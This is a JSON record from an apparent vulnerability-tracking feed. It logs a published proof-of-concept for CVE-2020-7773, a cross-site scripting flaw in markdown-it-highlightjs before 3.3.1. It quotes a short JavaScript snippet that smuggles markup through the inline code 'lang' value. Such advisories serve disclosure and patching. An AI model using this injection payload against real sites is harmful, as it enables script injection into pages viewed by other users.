{"vulnerability": "cve-2020-7773", "sightings": [{"uuid": "02c4e581-ea3d-4ca2-8a25-0d40891dc235", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-7773", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/16341", "content": "\u203c CVE-2020-7773 \u203c\n\nThis affects the package markdown-it-highlightjs before 3.3.1. It is possible insert malicious JavaScript as a value of lang in the markdown-it-highlightjs Inline code highlighting feature. const markdownItHighlightjs = require(\"markdown-it-highlightjs\"); const md = require('markdown-it'); const reuslt_xss = md() .use(markdownItHighlightjs, { inline: true }) .render('console.log(42){.\">js}'); console.log(reuslt_xss);\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-11-16T14:37:24.000000Z"}]}